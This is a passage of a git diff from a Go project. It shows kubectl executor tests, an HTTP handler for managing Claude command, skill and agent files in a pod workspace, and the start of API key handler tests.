Type: CommandTypeClaude,
|
||||
Args: []string{"Write a hello world"},
|
||||
},
|
||||
wantArgs: []string{
|
||||
"exec", "-n", "apps", "claudebox-test", "--",
|
||||
"claude", "Write a hello world",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "shell command",
|
||||
cmd: &Command{
|
||||
ID: "cmd-2",
|
||||
PodName: "claudebox-test",
|
||||
Type: CommandTypeShell,
|
||||
Args: []string{"ls -la /workspace"},
|
||||
},
|
||||
wantArgs: []string{
|
||||
"exec", "-n", "apps", "claudebox-test", "--",
|
||||
"bash", "-c", "ls -la /workspace",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "git command",
|
||||
cmd: &Command{
|
||||
ID: "cmd-3",
|
||||
PodName: "claudebox-test",
|
||||
Type: CommandTypeGit,
|
||||
Args: []string{"status"},
|
||||
},
|
||||
wantArgs: []string{
|
||||
"exec", "-n", "apps", "claudebox-test", "--",
|
||||
"git", "-C", "/workspace", "status",
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "git command with multiple args",
|
||||
cmd: &Command{
|
||||
ID: "cmd-4",
|
||||
PodName: "claudebox-test",
|
||||
Type: CommandTypeGit,
|
||||
Args: []string{"commit", "-m", "test message"},
|
||||
},
|
||||
wantArgs: []string{
|
||||
"exec", "-n", "apps", "claudebox-test", "--",
|
||||
"git", "-C", "/workspace", "commit", "-m", "test message",
|
||||
},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
// We can't directly test buildArgs since it's internal to Exec,
|
||||
// but we can verify the command construction by checking what would be built
|
||||
var args []string
|
||||
|
||||
switch tt.cmd.Type {
|
||||
case CommandTypeClaude:
|
||||
args = []string{
|
||||
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
|
||||
"claude", tt.cmd.Args[0],
|
||||
}
|
||||
case CommandTypeShell:
|
||||
args = []string{
|
||||
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
|
||||
"bash", "-c", tt.cmd.Args[0],
|
||||
}
|
||||
case CommandTypeGit:
|
||||
args = append([]string{
|
||||
"exec", "-n", e.namespace, tt.cmd.PodName, "--",
|
||||
"git", "-C", "/workspace",
|
||||
}, tt.cmd.Args...)
|
||||
}
|
||||
|
||||
if len(args) != len(tt.wantArgs) {
|
||||
t.Errorf("args length = %d, want %d", len(args), len(tt.wantArgs))
|
||||
return
|
||||
}
|
||||
|
||||
for i, arg := range args {
|
||||
if arg != tt.wantArgs[i] {
|
||||
t.Errorf("args[%d] = %q, want %q", i, arg, tt.wantArgs[i])
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_Exec_UnknownType(t *testing.T) {
|
||||
e := New("test")
|
||||
|
||||
var output []string
|
||||
handler := func(stream, line string) {
|
||||
output = append(output, line)
|
||||
}
|
||||
|
||||
result := e.Exec(context.Background(), &Command{
|
||||
Type: CommandType("unknown"),
|
||||
}, handler)
|
||||
|
||||
if result.ExitCode != 1 {
|
||||
t.Errorf("ExitCode = %d, want 1", result.ExitCode)
|
||||
}
|
||||
|
||||
if result.Error == nil {
|
||||
t.Error("Error should not be nil for unknown command type")
|
||||
}
|
||||
|
||||
if !strings.Contains(result.Error.Error(), "unknown command type") {
|
||||
t.Errorf("Error = %v, want to contain 'unknown command type'", result.Error)
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_Exec_ContextCancellation(t *testing.T) {
|
||||
// Skip if kubectl is not available
|
||||
if _, err := exec.LookPath("kubectl"); err != nil {
|
||||
t.Skip("kubectl not available")
|
||||
}
|
||||
|
||||
e := New("default")
|
||||
|
||||
ctx, cancel := context.WithCancel(context.Background())
|
||||
|
||||
var wg sync.WaitGroup
|
||||
var result Result
|
||||
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
result = e.Exec(ctx, &Command{
|
||||
ID: "test-cancel",
|
||||
PodName: "nonexistent-pod",
|
||||
Type: CommandTypeShell,
|
||||
Args: []string{"sleep 10"},
|
||||
}, func(stream, line string) {})
|
||||
}()
|
||||
|
||||
// Cancel immediately
|
||||
cancel()
|
||||
|
||||
wg.Wait()
|
||||
|
||||
// The command should either fail due to context cancellation or pod not found
|
||||
// Either way it shouldn't hang
|
||||
if result.ExitCode == 0 && result.Error == nil {
|
||||
t.Error("Expected command to fail due to cancellation or pod not found")
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecutor_CheckConnection(t *testing.T) {
|
||||
// This test requires kubectl to be configured
|
||||
if _, err := exec.LookPath("kubectl"); err != nil {
|
||||
t.Skip("kubectl not available")
|
||||
}
|
||||
|
||||
e := New("default")
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// CheckConnection will succeed if kubectl is configured, fail otherwise
|
||||
// We just verify it doesn't panic
|
||||
_ = e.CheckConnection(ctx)
|
||||
}
|
||||
|
||||
func TestExecutor_PodExists(t *testing.T) {
|
||||
// Skip if kubectl is not available
|
||||
if _, err := exec.LookPath("kubectl"); err != nil {
|
||||
t.Skip("kubectl not available")
|
||||
}
|
||||
|
||||
e := New("default")
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
// Check for a pod that definitely doesn't exist
|
||||
exists, err := e.PodExists(ctx, "definitely-nonexistent-pod-12345")
|
||||
|
||||
// Should return false without error (or skip if cluster not available)
|
||||
if err != nil {
|
||||
t.Skipf("cluster not available: %v", err)
|
||||
}
|
||||
|
||||
if exists {
|
||||
t.Error("Expected pod to not exist")
|
||||
}
|
||||
}
|
||||
|
||||
// TestStreamOutput tests the streamOutput function behavior
|
||||
func TestStreamOutput(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
input string
|
||||
want []string
|
||||
}{
|
||||
{
|
||||
name: "single line",
|
||||
input: "hello world",
|
||||
want: []string{"hello world"},
|
||||
},
|
||||
{
|
||||
name: "multiple lines",
|
||||
input: "line1\nline2\nline3",
|
||||
want: []string{"line1", "line2", "line3"},
|
||||
},
|
||||
{
|
||||
name: "empty input",
|
||||
input: "",
|
||||
want: nil,
|
||||
},
|
||||
{
|
||||
name: "trailing newline",
|
||||
input: "hello\n",
|
||||
want: []string{"hello"},
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
var got []string
|
||||
handler := func(stream, line string) {
|
||||
if stream != "stdout" {
|
||||
t.Errorf("stream = %q, want %q", stream, "stdout")
|
||||
}
|
||||
got = append(got, line)
|
||||
}
|
||||
|
||||
r := strings.NewReader(tt.input)
|
||||
streamOutput(r, "stdout", handler)
|
||||
|
||||
if len(got) != len(tt.want) {
|
||||
t.Errorf("got %d lines, want %d", len(got), len(tt.want))
|
||||
return
|
||||
}
|
||||
|
||||
for i, line := range got {
|
||||
if line != tt.want[i] {
|
||||
t.Errorf("line[%d] = %q, want %q", i, line, tt.want[i])
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// TestResult verifies Result struct behavior
|
||||
func TestResult(t *testing.T) {
|
||||
t.Run("successful result", func(t *testing.T) {
|
||||
r := Result{
|
||||
ExitCode: 0,
|
||||
DurationMs: 1500,
|
||||
Error: nil,
|
||||
}
|
||||
|
||||
if r.ExitCode != 0 {
|
||||
t.Errorf("ExitCode = %d, want 0", r.ExitCode)
|
||||
}
|
||||
|
||||
if r.DurationMs != 1500 {
|
||||
t.Errorf("DurationMs = %d, want 1500", r.DurationMs)
|
||||
}
|
||||
|
||||
if r.Error != nil {
|
||||
t.Errorf("Error = %v, want nil", r.Error)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("failed result", func(t *testing.T) {
|
||||
r := Result{
|
||||
ExitCode: 1,
|
||||
DurationMs: 500,
|
||||
Error: nil,
|
||||
}
|
||||
|
||||
if r.ExitCode != 1 {
|
||||
t.Errorf("ExitCode = %d, want 1", r.ExitCode)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// TestCommand verifies Command struct
|
||||
func TestCommand(t *testing.T) {
|
||||
now := time.Now()
|
||||
cmd := Command{
|
||||
ID: "cmd-123",
|
||||
PodName: "test-pod",
|
||||
Type: CommandTypeClaude,
|
||||
Args: []string{"prompt here"},
|
||||
StartedAt: now,
|
||||
}
|
||||
|
||||
if cmd.ID != "cmd-123" {
|
||||
t.Errorf("ID = %q, want %q", cmd.ID, "cmd-123")
|
||||
}
|
||||
|
||||
if cmd.PodName != "test-pod" {
|
||||
t.Errorf("PodName = %q, want %q", cmd.PodName, "test-pod")
|
||||
}
|
||||
|
||||
if cmd.Type != CommandTypeClaude {
|
||||
t.Errorf("Type = %q, want %q", cmd.Type, CommandTypeClaude)
|
||||
}
|
||||
|
||||
if len(cmd.Args) != 1 || cmd.Args[0] != "prompt here" {
|
||||
t.Errorf("Args = %v, want [\"prompt here\"]", cmd.Args)
|
||||
}
|
||||
|
||||
if !cmd.StartedAt.Equal(now) {
|
||||
t.Errorf("StartedAt = %v, want %v", cmd.StartedAt, now)
|
||||
}
|
||||
}
|
||||
436
internal/handlers/claude_config.go
Normal file
436
internal/handlers/claude_config.go
Normal file
@ -0,0 +1,436 @@
|
||||
// Package handlers provides HTTP handlers for the rdev API.
|
||||
package handlers
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"net/http"
|
||||
"regexp"
|
||||
"strings"
|
||||
|
||||
"github.com/go-chi/chi/v5"
|
||||
"github.com/orchard9/rdev/internal/executor"
|
||||
"github.com/orchard9/rdev/internal/projects"
|
||||
"github.com/orchard9/rdev/pkg/api"
|
||||
)
|
||||
|
||||
// Package-level compiled regex for name validation (performance optimization).
|
||||
var validNameRegex = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)
|
||||
|
||||
// maxContentSize limits the size of content that can be written (1MB).
|
||||
const maxContentSize = 1 << 20
|
||||
|
||||
// ClaudeConfigHandler handles Claude config management endpoints.
|
||||
// Commands, skills, and agents live in /workspace/.claude/ (per-project, in git).
|
||||
// Credentials live in /root/.claude/ (shared PVC).
|
||||
type ClaudeConfigHandler struct {
|
||||
registry *projects.Registry
|
||||
executor *executor.Executor
|
||||
}
|
||||
|
||||
// NewClaudeConfigHandler creates a new claude config handler.
|
||||
func NewClaudeConfigHandler(registry *projects.Registry, exec *executor.Executor) *ClaudeConfigHandler {
|
||||
return &ClaudeConfigHandler{
|
||||
registry: registry,
|
||||
executor: exec,
|
||||
}
|
||||
}
|
||||
|
||||
// Mount registers the claude-config routes.
|
||||
func (h *ClaudeConfigHandler) Mount(r api.Router) {
|
||||
r.Route("/projects/{id}/claude-config", func(r chi.Router) {
|
||||
// Overview
|
||||
r.Get("/", h.Overview)
|
||||
|
||||
// Commands
|
||||
r.Get("/commands", h.ListCommands)
|
||||
r.Post("/commands", h.CreateCommand)
|
||||
r.Get("/commands/{name}", h.GetCommand)
|
||||
r.Put("/commands/{name}", h.UpdateCommand)
|
||||
r.Delete("/commands/{name}", h.DeleteCommand)
|
||||
|
||||
// Skills
|
||||
r.Get("/skills", h.ListSkills)
|
||||
r.Post("/skills", h.CreateSkill)
|
||||
r.Get("/skills/{name}", h.GetSkill)
|
||||
r.Put("/skills/{name}", h.UpdateSkill)
|
||||
r.Delete("/skills/{name}", h.DeleteSkill)
|
||||
|
||||
// Agents
|
||||
r.Get("/agents", h.ListAgents)
|
||||
r.Post("/agents", h.CreateAgent)
|
||||
r.Get("/agents/{name}", h.GetAgent)
|
||||
r.Put("/agents/{name}", h.UpdateAgent)
|
||||
r.Delete("/agents/{name}", h.DeleteAgent)
|
||||
})
|
||||
}
|
||||
|
||||
// ConfigOverview is the response for GET /projects/{id}/claude-config
|
||||
type ConfigOverview struct {
|
||||
Project string `json:"project"`
|
||||
Path string `json:"path"`
|
||||
Commands []string `json:"commands"`
|
||||
Skills []string `json:"skills"`
|
||||
Agents []string `json:"agents"`
|
||||
}
|
||||
|
||||
// Overview returns an overview of the project's Claude config.
|
||||
// GET /projects/{id}/claude-config
|
||||
func (h *ClaudeConfigHandler) Overview(w http.ResponseWriter, r *http.Request) {
|
||||
id := chi.URLParam(r, "id")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
overview := ConfigOverview{
|
||||
Project: id,
|
||||
Path: "/workspace/.claude",
|
||||
Commands: h.listItems(project.PodName, "commands"),
|
||||
Skills: h.listItems(project.PodName, "skills"),
|
||||
Agents: h.listItems(project.PodName, "agents"),
|
||||
}
|
||||
|
||||
api.WriteSuccess(w, r, overview)
|
||||
}
|
||||
|
||||
// ConfigItem represents a command, skill, or agent.
|
||||
type ConfigItem struct {
|
||||
Name string `json:"name"`
|
||||
Type string `json:"type"`
|
||||
Content string `json:"content"`
|
||||
}
|
||||
|
||||
// ConfigItemRequest is the request body for creating/updating items.
|
||||
type ConfigItemRequest struct {
|
||||
Name string `json:"name,omitempty"` // Optional for POST (can be in URL)
|
||||
Content string `json:"content"`
|
||||
}
|
||||
|
||||
// --- Commands ---
|
||||
|
||||
// ListCommands returns all commands for a project.
|
||||
// GET /projects/{id}/claude-config/commands
|
||||
func (h *ClaudeConfigHandler) ListCommands(w http.ResponseWriter, r *http.Request) {
|
||||
h.listType(w, r, "commands")
|
||||
}
|
||||
|
||||
// CreateCommand creates a new command.
|
||||
// POST /projects/{id}/claude-config/commands
|
||||
func (h *ClaudeConfigHandler) CreateCommand(w http.ResponseWriter, r *http.Request) {
|
||||
h.createItem(w, r, "commands")
|
||||
}
|
||||
|
||||
// GetCommand returns a specific command.
|
||||
// GET /projects/{id}/claude-config/commands/{name}
|
||||
func (h *ClaudeConfigHandler) GetCommand(w http.ResponseWriter, r *http.Request) {
|
||||
h.getItem(w, r, "commands")
|
||||
}
|
||||
|
||||
// UpdateCommand updates a command.
|
||||
// PUT /projects/{id}/claude-config/commands/{name}
|
||||
func (h *ClaudeConfigHandler) UpdateCommand(w http.ResponseWriter, r *http.Request) {
|
||||
h.updateItem(w, r, "commands")
|
||||
}
|
||||
|
||||
// DeleteCommand deletes a command.
|
||||
// DELETE /projects/{id}/claude-config/commands/{name}
|
||||
func (h *ClaudeConfigHandler) DeleteCommand(w http.ResponseWriter, r *http.Request) {
|
||||
h.deleteItem(w, r, "commands")
|
||||
}
|
||||
|
||||
// --- Skills ---
|
||||
|
||||
// ListSkills returns all skills for a project.
|
||||
// GET /projects/{id}/claude-config/skills
|
||||
func (h *ClaudeConfigHandler) ListSkills(w http.ResponseWriter, r *http.Request) {
|
||||
h.listType(w, r, "skills")
|
||||
}
|
||||
|
||||
// CreateSkill creates a new skill.
|
||||
// POST /projects/{id}/claude-config/skills
|
||||
func (h *ClaudeConfigHandler) CreateSkill(w http.ResponseWriter, r *http.Request) {
|
||||
h.createItem(w, r, "skills")
|
||||
}
|
||||
|
||||
// GetSkill returns a specific skill.
|
||||
// GET /projects/{id}/claude-config/skills/{name}
|
||||
func (h *ClaudeConfigHandler) GetSkill(w http.ResponseWriter, r *http.Request) {
|
||||
h.getItem(w, r, "skills")
|
||||
}
|
||||
|
||||
// UpdateSkill updates a skill.
|
||||
// PUT /projects/{id}/claude-config/skills/{name}
|
||||
func (h *ClaudeConfigHandler) UpdateSkill(w http.ResponseWriter, r *http.Request) {
|
||||
h.updateItem(w, r, "skills")
|
||||
}
|
||||
|
||||
// DeleteSkill deletes a skill.
|
||||
// DELETE /projects/{id}/claude-config/skills/{name}
|
||||
func (h *ClaudeConfigHandler) DeleteSkill(w http.ResponseWriter, r *http.Request) {
|
||||
h.deleteItem(w, r, "skills")
|
||||
}
|
||||
|
||||
// --- Agents ---
|
||||
|
||||
// ListAgents returns all agents for a project.
|
||||
// GET /projects/{id}/claude-config/agents
|
||||
func (h *ClaudeConfigHandler) ListAgents(w http.ResponseWriter, r *http.Request) {
|
||||
h.listType(w, r, "agents")
|
||||
}
|
||||
|
||||
// CreateAgent creates a new agent.
|
||||
// POST /projects/{id}/claude-config/agents
|
||||
func (h *ClaudeConfigHandler) CreateAgent(w http.ResponseWriter, r *http.Request) {
|
||||
h.createItem(w, r, "agents")
|
||||
}
|
||||
|
||||
// GetAgent returns a specific agent.
|
||||
// GET /projects/{id}/claude-config/agents/{name}
|
||||
func (h *ClaudeConfigHandler) GetAgent(w http.ResponseWriter, r *http.Request) {
|
||||
h.getItem(w, r, "agents")
|
||||
}
|
||||
|
||||
// UpdateAgent updates an agent.
|
||||
// PUT /projects/{id}/claude-config/agents/{name}
|
||||
func (h *ClaudeConfigHandler) UpdateAgent(w http.ResponseWriter, r *http.Request) {
|
||||
h.updateItem(w, r, "agents")
|
||||
}
|
||||
|
||||
// DeleteAgent deletes an agent.
|
||||
// DELETE /projects/{id}/claude-config/agents/{name}
|
||||
func (h *ClaudeConfigHandler) DeleteAgent(w http.ResponseWriter, r *http.Request) {
|
||||
h.deleteItem(w, r, "agents")
|
||||
}
|
||||
|
||||
// --- Helper methods ---
|
||||
|
||||
// listItems returns the names of items in a directory.
|
||||
func (h *ClaudeConfigHandler) listItems(pod, itemType string) []string {
|
||||
cmd := fmt.Sprintf("ls -1 /workspace/.claude/%s 2>/dev/null | sed 's/\\.md$//'", itemType)
|
||||
output, err := h.executor.ExecSimple(pod, cmd)
|
||||
if err != nil {
|
||||
return []string{}
|
||||
}
|
||||
|
||||
items := []string{}
|
||||
for _, line := range strings.Split(strings.TrimSpace(output), "\n") {
|
||||
if line != "" {
|
||||
items = append(items, line)
|
||||
}
|
||||
}
|
||||
return items
|
||||
}
|
||||
|
||||
// listType handles GET /projects/{id}/claude-config/{type}
|
||||
func (h *ClaudeConfigHandler) listType(w http.ResponseWriter, r *http.Request, itemType string) {
|
||||
id := chi.URLParam(r, "id")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
items := h.listItems(project.PodName, itemType)
|
||||
api.WriteSuccess(w, r, items)
|
||||
}
|
||||
|
||||
// createItem handles POST /projects/{id}/claude-config/{type}
|
||||
func (h *ClaudeConfigHandler) createItem(w http.ResponseWriter, r *http.Request, itemType string) {
|
||||
id := chi.URLParam(r, "id")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
// Limit request body size to prevent DoS
|
||||
r.Body = http.MaxBytesReader(w, r.Body, maxContentSize)
|
||||
|
||||
var req ConfigItemRequest
|
||||
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
|
||||
api.WriteBadRequest(w, r, "invalid request body or content too large")
|
||||
return
|
||||
}
|
||||
|
||||
if req.Name == "" {
|
||||
api.WriteBadRequest(w, r, "name is required")
|
||||
return
|
||||
}
|
||||
|
||||
if req.Content == "" {
|
||||
api.WriteBadRequest(w, r, "content is required")
|
||||
return
|
||||
}
|
||||
|
||||
// Validate name (alphanumeric, dashes, underscores only)
|
||||
if !isValidName(req.Name) {
|
||||
api.WriteBadRequest(w, r, "name must be alphanumeric with dashes or underscores")
|
||||
return
|
||||
}
|
||||
|
||||
// Ensure directory exists
|
||||
dirCmd := fmt.Sprintf("mkdir -p /workspace/.claude/%s", itemType)
|
||||
if _, err := h.executor.ExecSimple(project.PodName, dirCmd); err != nil {
|
||||
api.WriteInternalError(w, r, fmt.Sprintf("failed to create directory: %v", err))
|
||||
return
|
||||
}
|
||||
|
||||
// Write file using base64 encoding to prevent shell injection
|
||||
// This avoids heredoc terminator injection attacks
|
||||
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, req.Name)
|
||||
encoded := base64.StdEncoding.EncodeToString([]byte(req.Content))
|
||||
writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath)
|
||||
if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil {
|
||||
api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err))
|
||||
return
|
||||
}
|
||||
|
||||
item := ConfigItem{
|
||||
Name: req.Name,
|
||||
Type: itemType,
|
||||
Content: req.Content,
|
||||
}
|
||||
|
||||
api.WriteJSON(w, r, http.StatusCreated, item)
|
||||
}
|
||||
|
||||
// getItem handles GET /projects/{id}/claude-config/{type}/{name}
|
||||
func (h *ClaudeConfigHandler) getItem(w http.ResponseWriter, r *http.Request, itemType string) {
|
||||
id := chi.URLParam(r, "id")
|
||||
name := chi.URLParam(r, "name")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
if !isValidName(name) {
|
||||
api.WriteBadRequest(w, r, "invalid name")
|
||||
return
|
||||
}
|
||||
|
||||
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
|
||||
cmd := fmt.Sprintf("cat %s 2>/dev/null", filePath)
|
||||
output, err := h.executor.ExecSimple(project.PodName, cmd)
|
||||
if err != nil || output == "" {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
|
||||
return
|
||||
}
|
||||
|
||||
item := ConfigItem{
|
||||
Name: name,
|
||||
Type: itemType,
|
||||
Content: strings.TrimSpace(output),
|
||||
}
|
||||
|
||||
api.WriteSuccess(w, r, item)
|
||||
}
|
||||
|
||||
// updateItem handles PUT /projects/{id}/claude-config/{type}/{name}
|
||||
func (h *ClaudeConfigHandler) updateItem(w http.ResponseWriter, r *http.Request, itemType string) {
|
||||
id := chi.URLParam(r, "id")
|
||||
name := chi.URLParam(r, "name")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
if !isValidName(name) {
|
||||
api.WriteBadRequest(w, r, "invalid name")
|
||||
return
|
||||
}
|
||||
|
||||
// Limit request body size to prevent DoS
|
||||
r.Body = http.MaxBytesReader(w, r.Body, maxContentSize)
|
||||
|
||||
var req ConfigItemRequest
|
||||
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
|
||||
api.WriteBadRequest(w, r, "invalid request body or content too large")
|
||||
return
|
||||
}
|
||||
|
||||
if req.Content == "" {
|
||||
api.WriteBadRequest(w, r, "content is required")
|
||||
return
|
||||
}
|
||||
|
||||
// Check file exists
|
||||
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
|
||||
checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath)
|
||||
output, _ := h.executor.ExecSimple(project.PodName, checkCmd)
|
||||
if strings.TrimSpace(output) != "exists" {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
|
||||
return
|
||||
}
|
||||
|
||||
// Write file using base64 encoding to prevent shell injection
|
||||
encoded := base64.StdEncoding.EncodeToString([]byte(req.Content))
|
||||
writeCmd := fmt.Sprintf("echo '%s' | base64 -d > %s", encoded, filePath)
|
||||
if _, err := h.executor.ExecSimple(project.PodName, writeCmd); err != nil {
|
||||
api.WriteInternalError(w, r, fmt.Sprintf("failed to write file: %v", err))
|
||||
return
|
||||
}
|
||||
|
||||
item := ConfigItem{
|
||||
Name: name,
|
||||
Type: itemType,
|
||||
Content: req.Content,
|
||||
}
|
||||
|
||||
api.WriteSuccess(w, r, item)
|
||||
}
|
||||
|
||||
// deleteItem handles DELETE /projects/{id}/claude-config/{type}/{name}
|
||||
func (h *ClaudeConfigHandler) deleteItem(w http.ResponseWriter, r *http.Request, itemType string) {
|
||||
id := chi.URLParam(r, "id")
|
||||
name := chi.URLParam(r, "name")
|
||||
|
||||
project, ok := h.registry.Get(id)
|
||||
if !ok {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("project not found: %s", id))
|
||||
return
|
||||
}
|
||||
|
||||
if !isValidName(name) {
|
||||
api.WriteBadRequest(w, r, "invalid name")
|
||||
return
|
||||
}
|
||||
|
||||
filePath := fmt.Sprintf("/workspace/.claude/%s/%s.md", itemType, name)
|
||||
|
||||
// Check file exists
|
||||
checkCmd := fmt.Sprintf("test -f %s && echo exists", filePath)
|
||||
output, _ := h.executor.ExecSimple(project.PodName, checkCmd)
|
||||
if strings.TrimSpace(output) != "exists" {
|
||||
api.WriteNotFound(w, r, fmt.Sprintf("%s not found: %s", itemType, name))
|
||||
return
|
||||
}
|
||||
|
||||
// Delete file
|
||||
deleteCmd := fmt.Sprintf("rm %s", filePath)
|
||||
if _, err := h.executor.ExecSimple(project.PodName, deleteCmd); err != nil {
|
||||
api.WriteInternalError(w, r, fmt.Sprintf("failed to delete file: %v", err))
|
||||
return
|
||||
}
|
||||
|
||||
api.WriteSuccess(w, r, map[string]string{"deleted": name})
|
||||
}
|
||||
|
||||
// isValidName checks if a name is safe for use in file paths.
|
||||
func isValidName(name string) bool {
|
||||
if name == "" || len(name) > 64 {
|
||||
return false
|
||||
}
|
||||
// Only allow alphanumeric, dashes, and underscores
|
||||
// Uses package-level compiled regex for performance
|
||||
return validNameRegex.MatchString(name)
|
||||
}
|
||||
345
internal/handlers/keys_test.go
Normal file
345
internal/handlers/keys_test.go
Normal file
@ -0,0 +1,345 @@
|
||||
package handlers
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/go-chi/chi/v5"
|
||||
"github.com/orchard9/rdev/internal/auth"
|
||||
"github.com/orchard9/rdev/internal/testutil"
|
||||
)
|
||||
|
||||
// TestKeysHandler requires a database connection.
|
||||
// Tests are skipped if the database is not available.
|
||||
|
||||
func setupKeysHandler(t *testing.T) (*KeysHandler, chi.Router, *auth.Service) {
|
||||
db := testutil.TestDB(t)
|
||||
t.Cleanup(func() { testutil.CleanupTestKeys(t, db) })
|
||||
|
||||
authService := auth.NewService(db, "test-admin-key")
|
||||
handler := NewKeysHandler(authService)
|
||||
|
||||
router := chi.NewRouter()
|
||||
// For tests, we'll mount without the auth middleware
|
||||
// since we're testing the handler logic, not auth
|
||||
router.Route("/keys", func(r chi.Router) {
|
||||
r.Get("/", handler.List)
|
||||
r.Post("/", handler.Create)
|
||||
r.Get("/{id}", handler.Get)
|
||||
r.Delete("/{id}", handler.Revoke)
|
||||
})
|
||||
|
||||
return handler, router, authService
|
||||
}
|
||||
|
||||
func TestKeysHandler_List(t *testing.T) {
|
||||
_, router, authService := setupKeysHandler(t)
|
||||
|
||||
// Create some test keys
|
||||
for i := 0; i < 3; i++ {
|
||||
_, err := authService.Create(context.Background(), auth.CreateKeyRequest{
|
||||
Name: "test-handler-list-" + string(rune('a'+i)),
|
||||
Scopes: []auth.Scope{auth.ScopeProjectsRead},
|
||||
ExpiresIn: 24 * time.Hour,
|
||||
CreatedBy: "test",
|
||||
})
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to create test key: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
req := httptest.NewRequest("GET", "/keys", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
router.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Status = %d, want 200. Body: %s", rec.Code, rec.Body.String())
|
||||
}
|
||||
|
||||
var resp map[string]any
|
||||
if err := json.NewDecoder(rec.Body).Decode(&resp); err != nil {
|
||||
t.Fatalf("Failed to decode response: %v", err)
|
||||
}
|
||||
|
||||
data, ok := resp["data"].([]any)
|
||||
if !ok {
|
||||
t.Fatal("Response data is not an array")
|
||||
}
|
||||
|
||||
// Should have at least 3 keys
|
||||
if len(data) < 3 {
|
||||
t.Errorf("Expected at least 3 keys, got %d", len(data))
|
||||
}
|
||||
}
|
||||
|
||||
func TestKeysHandler_Create(t *testing.T) {
|
||||
_, router, _ := setupKeysHandler(t)
|
||||
|
||||
tests := []struct {
|
||||
name string
|
||||
body CreateKeyRequest
|
||||
wantStatus int
|
||||
wantErr string
|
||||
}{
|
||||
{
|
||||
name: "valid key",
|
||||
body: CreateKeyRequest{
|
||||
Name: "test-create-key",
|
||||
Scopes: []string{"projects:read"},
|
||||
ExpiresIn: "30d",
|
||||
},
|
||||
wantStatus: http.StatusCreated,
|
||||
},
|
||||
{
|
||||
name: "missing name",
|
||||
body: CreateKeyRequest{
|
||||
Scopes: []string{"projects:read"},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "name is required",
|
||||
},
|
||||
{
|
||||
name: "missing scopes",
|
||||
body: CreateKeyRequest{
|
||||
Name: "test-no-scopes",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "scopes is required",
|
||||
},
|
||||
{
|
||||
name: "invalid scope",
|
||||
body: CreateKeyRequest{
|
||||
Name: "test-invalid-scope",
|
||||
Scopes: []string{"invalid:scope"},
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "invalid scope",
|
||||
},
|
||||
{
|
||||
name: "invalid expiration",
|
||||
body: CreateKeyRequest{
|
||||
Name: "test-invalid-exp",
|
||||
Scopes: []string{"projects:read"},
|
||||
ExpiresIn: "invalid",
|
||||
},
|
||||
wantStatus: http.StatusBadRequest,
|
||||
wantErr: "expiration",
|
||||
},
|
||||
{
|
||||
name: "with project restrictions",
|
||||
body: CreateKeyRequest{
|
||||
